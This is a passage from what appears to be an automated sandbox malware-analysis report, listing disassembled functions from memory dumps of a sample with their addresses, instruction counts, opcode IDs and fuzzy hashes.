                                                                    • Opcode Fuzzy Hash: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
                                                                    • Instruction Fuzzy Hash: E0D0A930B60A0C4B8B0CB63D8858430B3D2E7AA20A384627C940BC3281ED25ECCACB80
                                                                    Function 00007FF848E633D1 Relevance: .0, Instructions: 20COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000016.00000002.2367279887.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_22_2_7ff848e60000_mQBLhXIPAJ.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 840ea9db971bae5ca5a55bab3c63b7ccc2f8042cc0857c3fcf9c753694177ce7
                                                                    • Instruction ID: cadf967c029e486b9d6c9b0734e6fc60d261c9c85d6428012597e678f49e7799
                                                                    • Opcode Fuzzy Hash: 840ea9db971bae5ca5a55bab3c63b7ccc2f8042cc0857c3fcf9c753694177ce7
                                                                    • Instruction Fuzzy Hash: 0FE01A20F0D12A8FF795BA10C8503BD22A1BF85381F9450B9D86DB76E6CF387C818B49
                                                                    Function 00007FF848E63759 Relevance: .0, Instructions: 20COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000016.00000002.2367279887.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_22_2_7ff848e60000_mQBLhXIPAJ.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8d4b0ec0cb579521c937719aef03f6e241a8416c45da66fe7cc87ba479518b0e
                                                                    • Instruction ID: 8576958cd4ac830fef12b803800038b9b0a2429590f4631019fefa52e676df46
                                                                    • Opcode Fuzzy Hash: 8d4b0ec0cb579521c937719aef03f6e241a8416c45da66fe7cc87ba479518b0e
                                                                    • Instruction Fuzzy Hash: 0BE01211E1C5554EF29DB56C44313B950C1BF98751F884179D41EF32C3DE5C3C400396
                                                                    Function 00007FF848E606AD Relevance: .0, Instructions: 13COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000016.00000002.2367279887.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_22_2_7ff848e60000_mQBLhXIPAJ.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 323143e45dad86b09f48beb01337b17f3d2661350671268fcf99a56f238fe930
                                                                    • Instruction ID: 22c00e277981450ec3cfd80455c7aa1b3eb6fa9d4df6ebc78a5e847680a4518f
                                                                    • Opcode Fuzzy Hash: 323143e45dad86b09f48beb01337b17f3d2661350671268fcf99a56f238fe930
                                                                    • Instruction Fuzzy Hash: D6C08C00E5F53B08E445712E14020ACA2017BC42A0FD00032C02C700929EAD30C5034E
                                                                    Function 00007FF848E74718 Relevance: .0, Instructions: 13COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000016.00000002.2367279887.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_22_2_7ff848e70000_mQBLhXIPAJ.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 387e63c72d1cec51fb15f3eb6a8ae46cde76971a7f43caf43f88bfad3b8c216e
                                                                    • Instruction ID: 11fd52cc99a76da05a4c6e0ed7303f21fdb0b99c6a49702810bd3db6b46b8276
                                                                    • Opcode Fuzzy Hash: 387e63c72d1cec51fb15f3eb6a8ae46cde76971a7f43caf43f88bfad3b8c216e
                                                                    • Instruction Fuzzy Hash: 70D09230A1864A8FDB44EE08C880EAA33A1FB48704F204960E92983292DA35FC128B94
                                                                    Function 00007FF848E60B18 Relevance: .0, Instructions: 12COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000016.00000002.2367279887.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_22_2_7ff848e60000_mQBLhXIPAJ.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 679052432ff82eb440096a9787cbb4eb0fdac5f2628a477f2cc6cb2b7cc5e99a
                                                                    • Instruction ID: efbce210bacd50ef177f3dfb13d4aceba7f181afd6019f63510de32bdeb12342
                                                                    • Opcode Fuzzy Hash: 679052432ff82eb440096a9787cbb4eb0fdac5f2628a477f2cc6cb2b7cc5e99a
                                                                    • Instruction Fuzzy Hash: 39C04C305258098FC944FB6DC98995477A0FB1D215BD60190E40DC7171E66AEC95C745
                                                                    Function 00007FF848E612E0 Relevance: .0, Instructions: 12COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000016.00000002.2367279887.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_22_2_7ff848e60000_mQBLhXIPAJ.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b6d50836501c865efaa9cc7746ad9c52898e749de2a98b2e8a9a856be5527891
                                                                    • Instruction ID: 66eda309ea09482d7201f089046b183db6eb6a68ed1dc125f00a417f2063d7f1
                                                                    • Opcode Fuzzy Hash: b6d50836501c865efaa9cc7746ad9c52898e749de2a98b2e8a9a856be5527891
                                                                    • Instruction Fuzzy Hash: E0C08C309208088FC908FB28C88480433A0FB09200BC10090E008C7170E229ECD0C740
                                                                    Function 00007FF848E657D9 Relevance: .0, Instructions: 10COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000016.00000002.2367279887.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_22_2_7ff848e60000_mQBLhXIPAJ.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8332ee0c39d28a45c56d20edea293ca1febdd450cec6a4c005fa443bb8e153a1
                                                                    • Instruction ID: b7c20ec190b5097be4e15571560adc0851c018b982385d992c91ec7dbe5a96da
                                                                    • Opcode Fuzzy Hash: 8332ee0c39d28a45c56d20edea293ca1febdd450cec6a4c005fa443bb8e153a1
                                                                    • Instruction Fuzzy Hash: B7C08C05E1DC1A5AE25BA204401027E0012DF80B44F884031E01ED26CACE0D2A0106CA
                                                                    Function 00007FF848E79E2C Relevance: .0, Instructions: 10COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000016.00000002.2367279887.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_22_2_7ff848e70000_mQBLhXIPAJ.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b567058f7eec8211f091f5570d3c48fa7a9be4ca05688d63650a906f9a98df37
                                                                    • Instruction ID: 865005724ea984a9f10bb49a6285fe106a7e2a3011e3fa3f03cccf382a9b41f2
                                                                    • Opcode Fuzzy Hash: b567058f7eec8211f091f5570d3c48fa7a9be4ca05688d63650a906f9a98df37
                                                                    • Instruction Fuzzy Hash: C8D0C930C095588FEBA0EB14C840B9972B1BF48341F5001F6900DE3285CB356DC0CF81
                                                                    Function 00007FF848E606D0 Relevance: .0, Instructions: 8COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000016.00000002.2367279887.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_22_2_7ff848e60000_mQBLhXIPAJ.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: bca8a15959f7e0967de320f3aa0157698c38b87efa68259d0e12dbbb75d0c1cf
                                                                    • Instruction ID: 11f8d10550346e9f3a4f007398059a370a93a6d624c90b1792530cf415cde2e8
                                                                    • Opcode Fuzzy Hash: bca8a15959f7e0967de320f3aa0157698c38b87efa68259d0e12dbbb75d0c1cf
                                                                    • Instruction Fuzzy Hash: E5B01200CAE41F04E408317A094206470417BC4140FC00070D40C70086D9DD3094034A

                                                                    Executed Functions

                                                                    Function 00007FF848E707AC Relevance: 2.9, Strings: 1, Instructions: 1667COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000025.00000002.2402456375.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_37_2_7ff848e70000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: N_H
                                                                    • API String ID: 0-3193329873
                                                                    • Opcode ID: 5d51c51da70d3995440bd56e3302df43a726fdd4b4c563b821f3a2243537d338
                                                                    • Instruction ID: af79048cfd54706c28c793be5acd570a73d0199ab0bb1223eda165633a5d7051
                                                                    • Opcode Fuzzy Hash: 5d51c51da70d3995440bd56e3302df43a726fdd4b4c563b821f3a2243537d338
                                                                    • Instruction Fuzzy Hash: A6C2A430E1C95A9FEB98FA2884516B873A2FF94780F5445B9D00ED32C6DF39BC428785
                                                                    Function 00007FF848E70CFB Relevance: 2.2, Strings: 1, Instructions: 999COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000025.00000002.2402456375.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_37_2_7ff848e70000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: N_H
                                                                    • API String ID: 0-3193329873
                                                                    • Opcode ID: c2c61f4a2a1cc72da691ad46d29bca158706e8598cf7e508f38e03ce8a595f8e
                                                                    • Instruction ID: 98a5a85b97065e3a021aef6ed2b730a24e107eccdc8aa075271f2f157cc406e0
                                                                    • Opcode Fuzzy Hash: c2c61f4a2a1cc72da691ad46d29bca158706e8598cf7e508f38e03ce8a595f8e
                                                                    • Instruction Fuzzy Hash: 68629131E1CA5A9FEB98FA2884517B8B3E2FF54780F5445B9D00DD3286DF39AC428B45
                                                                    Function 00007FF848E60D7C Relevance: .3, Instructions: 268COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000025.00000002.2402456375.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_37_2_7ff848e60000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e670147826a3fe190b3b80290a09bd88971bf19ef0ad88d170458517d1b8c408
                                                                    • Instruction ID: 76e31c3030fcf76f62eb0e99d697cc77b20e624cafb8962eeb8c83e448fec7de
                                                                    • Opcode Fuzzy Hash: e670147826a3fe190b3b80290a09bd88971bf19ef0ad88d170458517d1b8c408
                                                                    • Instruction Fuzzy Hash: D391F471E1DA998FE789EB6888247A9BFE0FB96350F4400BEC04AE72D6DB781405C711
                                                                    Function 00007FF848E60B3F Relevance: 3.8, Strings: 3, Instructions: 54COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000025.00000002.2402456375.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_37_2_7ff848e60000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: c9$!k9$"s9
                                                                    • API String ID: 0-3426396564
                                                                    • Opcode ID: d2e26fa0ed65657ae63860e0153e178c88320430f77beff0b58864d7961f4ac1
                                                                    • Instruction ID: ea2171c56bb580886a4ffbd80badf8b0638c16910a09b71096214cd4efb4d34e
                                                                    • Opcode Fuzzy Hash: d2e26fa0ed65657ae63860e0153e178c88320430f77beff0b58864d7961f4ac1
                                                                    • Instruction Fuzzy Hash: FA01F22A31D95A8FC7026A3EB4905D87B50EAC6136BC905BBD544CB192E2102C9EC7E0
                                                                    Function 00007FF848E73A59 Relevance: 1.3, Strings: 1, Instructions: 28COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000025.00000002.2402456375.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_37_2_7ff848e70000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: M
                                                                    • API String ID: 0-3664761504
                                                                    • Opcode ID: 04e3bc488ff383cad87af2c48b25e0e79b7c93357064b3d58fac671219633f57
                                                                    • Instruction ID: 4f1eb89e65152582972edb072ef2b16f4389d8eaa760c4c01715dd6bced38d05
                                                                    • Opcode Fuzzy Hash: 04e3bc488ff383cad87af2c48b25e0e79b7c93357064b3d58fac671219633f57
                                                                    • Instruction Fuzzy Hash: 7EE09B7194E7C48FC71AEA3888694547F60EF6720174A41EEC045CF1A7DA2DCC45C711
                                                                    Function 00007FF848E608D0 Relevance: .2, Instructions: 158COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000025.00000002.2402456375.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_37_2_7ff848e60000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 4e15bf646551dcca90764154548d1c3d5b8316fd1ec64e946d586830311aa32b
                                                                    • Instruction ID: d26c37081765cb94f398be1a875888d576aedc5b1bfbebb16cc3de6a99b49270
                                                                    • Opcode Fuzzy Hash: 4e15bf646551dcca90764154548d1c3d5b8316fd1ec64e946d586830311aa32b
                                                                    • Instruction Fuzzy Hash: 18415862A4D9652FE708B77CA0992F97781FF853A1F0C45BBD04DCB193CF2868818798
                                                                    Function 00007FF848E723FB Relevance: .1, Instructions: 149COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000025.00000002.2402456375.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_37_2_7ff848e70000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2c68dc125700adfa7985cf99dd6d98a38d90ac628ade2315930ca8bc8a9355ae
                                                                    • Instruction ID: 06b0b7d2ca8d9503f9751028fce4d3e36e140ee53319ec2712d4f4260c85cc79
                                                                    • Opcode Fuzzy Hash: 2c68dc125700adfa7985cf99dd6d98a38d90ac628ade2315930ca8bc8a9355ae
                                                                    • Instruction Fuzzy Hash: 45311567B489715FC318B7ADF8921F4B750EF812BBB0C8177C288CA093DA14944A87E5
                                                                    Function 00007FF848E60998 Relevance: .1, Instructions: 100COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000025.00000002.2402456375.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_37_2_7ff848e60000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5ba611250e5df5a4cdf22a8342deb5268ca33e2b8385d7cdc6ee3ead8183c696
                                                                    • Instruction ID: 11e907b5f6267dd7cc034b333d7bd88acb3544a57d2cfd563fc75db04ab80c95
                                                                    • Opcode Fuzzy Hash: 5ba611250e5df5a4cdf22a8342deb5268ca33e2b8385d7cdc6ee3ead8183c696
                                                                    • Instruction Fuzzy Hash: A421D621B1DD591FE788B63C545A679B7C6FB993A1F5800BAE40EC32D7DE28AC424384
                                                                    Function 00007FF848E611A1 Relevance: .1, Instructions: 95COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000025.00000002.2402456375.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_37_2_7ff848e60000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9e66de6d702061f4268bb9cdde97cceb246a24ae5bd552d47c6cd30a2b21c8e6
                                                                    • Instruction ID: 64f9e2f05e7b32ff0fcbf25e29c2b6eeb4c7a9efd3c2ccf08c21c614fa01c74c
                                                                    • Opcode Fuzzy Hash: 9e66de6d702061f4268bb9cdde97cceb246a24ae5bd552d47c6cd30a2b21c8e6
                                                                    • Instruction Fuzzy Hash: 1D31733090D65A8FDB46FB68C8599B97BF0FF5A350F4505BBC009E72A2DB39A841CB50
                                                                    Function 00007FF848E74409 Relevance: .1, Instructions: 79COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000025.00000002.2402456375.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_37_2_7ff848e70000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5192b6d7a85f4cdcc71c037f512a3a99059b53ce8b941a2728ec7aa6ba6e4a8d
                                                                    • Instruction ID: 56acbcc58d1372140c8cffdc3b8dc17120e5ea5298a4870967307b48eae84915
                                                                    • Opcode Fuzzy Hash: 5192b6d7a85f4cdcc71c037f512a3a99059b53ce8b941a2728ec7aa6ba6e4a8d
                                                                    • Instruction Fuzzy Hash: 67212131E0CA8A4FE752BB3888581B93BE1FF55354F5902BBC44DC71D2EE38A9468345
                                                                    Function 00007FF848E60C25 Relevance: .1, Instructions: 79COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000025.00000002.2402456375.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_37_2_7ff848e60000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 975b3b91f0b8ee3079f3f768348a4800bedc7699497a5aca6ddeceef23ecde8d
                                                                    • Instruction ID: d654f3d2f212c9a42c8f9e6bd6cb77ee1a0ef297dba540a75a90104ece9be5c2
                                                                    • Opcode Fuzzy Hash: 975b3b91f0b8ee3079f3f768348a4800bedc7699497a5aca6ddeceef23ecde8d
                                                                    • Instruction Fuzzy Hash: E221EF31A0D699AFE712FB68C8452EC7FA0FF42360F5545BAC044BB1C2DB3829898795
                                                                    Function 00007FF848E65534 Relevance: .1, Instructions: 58COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000025.00000002.2402456375.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_37_2_7ff848e60000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3bf92dab81483fa3f90bde477b49eba6285cd17909a4737a030bc344866d149e
                                                                    • Instruction ID: 5a5fb26b5a360e80a853b985bf0c795c75e97f94f7fe8126292690efb4c8a6ba
                                                                    • Opcode Fuzzy Hash: 3bf92dab81483fa3f90bde477b49eba6285cd17909a4737a030bc344866d149e
                                                                    • Instruction Fuzzy Hash: C7113320E1CA1D4EE764BA1898592B872D1FF64350F9001B9D40EF72E3EF387D458649
                                                                    Function 00007FF848E60C40 Relevance: .0, Instructions: 47COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000025.00000002.2402456375.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_37_2_7ff848e60000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: abf99f9d6da5f1ee9a06b15bf328e92f7abbe2fc998a25cf68453c51e3e1192b
                                                                    • Instruction ID: f014a9776ce4ace1c321e131a013213350cba038f7e64a5605fa89d0002d1555
                                                                    • Opcode Fuzzy Hash: abf99f9d6da5f1ee9a06b15bf328e92f7abbe2fc998a25cf68453c51e3e1192b
                                                                    • Instruction Fuzzy Hash: DD01A93190D7989FE702FB68C8402D9BFB0EF42260F1545E6C084EB292D6386A488B94
                                                                    Function 00007FF848E60C48 Relevance: .0, Instructions: 41COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000025.00000002.2402456375.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_37_2_7ff848e60000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 05b8f81623dcae733afc4ba835cf905964f673d098c8caed54aa53849524525a
                                                                    • Instruction ID: 5b81689088e1651b8ea27da21b17f62667958134c266d0842065b5076d6c5dd7
                                                                    • Opcode Fuzzy Hash: 05b8f81623dcae733afc4ba835cf905964f673d098c8caed54aa53849524525a
                                                                    • Instruction Fuzzy Hash: 4C015A7190D7889FE706EB78C844699BFB0EF42314F1945EAD044EB2A2D6386A48C795
                                                                    Function 00007FF848E6566A Relevance: .0, Instructions: 39COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000025.00000002.2402456375.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_37_2_7ff848e60000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 739d002ec5213039a5f7b98b8673b3be312f800da77b00de52093fa9fbd50bdc
                                                                    • Instruction ID: d9e9e5e114ba3435dc3cd7457d5a57069b717a1a9f1459f116fc6fd3c0df7d05
                                                                    • Opcode Fuzzy Hash: 739d002ec5213039a5f7b98b8673b3be312f800da77b00de52093fa9fbd50bdc
                                                                    • Instruction Fuzzy Hash: 63F0313090C91E8EEB64FA14DC486B873A2FF64351F9001B9D44EF7192EF387D958A08
                                                                    Function 00007FF848E61A46 Relevance: .0, Instructions: 38COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000025.00000002.2402456375.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_37_2_7ff848e60000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 89c0a82084992239ebafedea8dd5cb1643df795a8e7827523f79678c6f1d6338
                                                                    • Instruction ID: e4f9da7576e16e4a9de2aa740fcf40f7c26e4cea1017c809e4662f17e7e78687
                                                                    • Opcode Fuzzy Hash: 89c0a82084992239ebafedea8dd5cb1643df795a8e7827523f79678c6f1d6338
                                                                    • Instruction Fuzzy Hash: DD011231908918CFCB58DB18D894E99B3F1FB58310F040299D40EE72A5CB35BE80CF85
                                                                    Function 00007FF848E74027 Relevance: .0, Instructions: 36COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000025.00000002.2402456375.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_37_2_7ff848e70000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: bdda8043fc52ba83a254331632e0859e0b83ae323da01329bd78cbb66f22daa0
                                                                    • Instruction ID: 1f0864360033987857ff22f2298bec043510baf963aa52f288a1d452ed55e07c
                                                                    • Opcode Fuzzy Hash: bdda8043fc52ba83a254331632e0859e0b83ae323da01329bd78cbb66f22daa0
                                                                    • Instruction Fuzzy Hash: F1F03770E0950A9FEB98EA48D455ABE77A2FB50390F00063ED016D2294EF786A418A84
                                                                    Function 00007FF848E60C50 Relevance: .0, Instructions: 36COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000025.00000002.2402456375.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_37_2_7ff848e60000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b63f48097854e00b1a5efbafa16e2e13b220365cbaaa931434158e922177c1ea
                                                                    • Instruction ID: 1d494a934a9f4f92c3d2dbaecd3e8bb8dcd43c5ac94dc5e43bfe9a6d2a606513
                                                                    • Opcode Fuzzy Hash: b63f48097854e00b1a5efbafa16e2e13b220365cbaaa931434158e922177c1ea
                                                                    • Instruction Fuzzy Hash: 40014B7090D7C99FE706FB74884469DBFF0EF06314F1845E6D444EB292DA386A48C745
                                                                    Function 00007FF848E746F9 Relevance: .0, Instructions: 35COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000025.00000002.2402456375.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_37_2_7ff848e70000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 083a21ada1682168b47cde5e652d200687d2cd7b1381fc97928a4b1d5b1f5c53
                                                                    • Instruction ID: 2c916c2a3778828c11199c0d54d13586963e90439a6b929b231ac04f996f01a9
                                                                    • Opcode Fuzzy Hash: 083a21ada1682168b47cde5e652d200687d2cd7b1381fc97928a4b1d5b1f5c53
                                                                    • Instruction Fuzzy Hash: 48F08230A0C95B8FE665BA5C94409BEB291FF44B98F104270D42AD31DAEF38EC1187C8
                                                                    Function 00007FF848E60B77 Relevance: .0, Instructions: 34COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000025.00000002.2402456375.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_37_2_7ff848e60000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 92b1d6e696249f69f5da86c40962c806f604502be92e693957885830a56fb57b
                                                                    • Instruction ID: 0463724105c59fff87dbdcdee3fb92fd12cc528830111bc805b7b8e71b0cb601
                                                                    • Opcode Fuzzy Hash: 92b1d6e696249f69f5da86c40962c806f604502be92e693957885830a56fb57b
                                                                    • Instruction Fuzzy Hash: 9AF0553020DA89CFC742AB3DC8A08D0BF60FF43204B8A00FAC088CB462C3245C5ECB00
                                                                    Function 00007FF848E6563C Relevance: .0, Instructions: 34COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000025.00000002.2402456375.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_37_2_7ff848e60000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 895523474eca11f6e4b9fbed8216664c3a21ebcb3f711ea33d7a945ed48ddad8
                                                                    • Instruction ID: 44e6ecc7956d6d1cc20c6e6cfc4d34b3b502825c445b06d011b98d177ef14cdb
                                                                    • Opcode Fuzzy Hash: 895523474eca11f6e4b9fbed8216664c3a21ebcb3f711ea33d7a945ed48ddad8
